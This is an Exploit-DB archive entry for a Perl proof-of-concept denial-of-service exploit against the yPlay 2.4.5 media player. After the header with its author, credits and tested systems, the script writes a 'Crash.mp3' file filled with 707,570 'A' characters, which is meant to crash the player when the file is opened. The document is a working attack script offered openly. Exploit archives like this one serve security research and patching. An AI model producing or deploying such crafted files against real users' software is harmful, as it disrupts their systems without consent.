exploit-db-mirror/exploits/windows/dos/15356.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

15 lines
No EOL
571 B
Perl
Executable file

#Exploit Title : yPlay Denial of Service Vulnerability
#Software : yPlay
#Software link : http://www.spacejock.m6.net/files/yPlayFull.exe
#Autor : ABDI MOHAMED
#Email : abdimohamed@hotmail.fr
#greetz: net_own3r , sadhacker , net-decrypt3r , xa7m3d , the commander , mr.fearfactor and all tunisian hackers
#Software version : 2.4.5
#Tested on : Win7 Ultimate fr + win xp sp 2
my $file="Crash.mp3";
my $junk="A"x707570;
open(POOH,">$file");
print POOH $junk;
print "[+]Malicious File created successfully!\n";
print "[+]Discovered and Coded by abdimohamed \n";
close(POOH);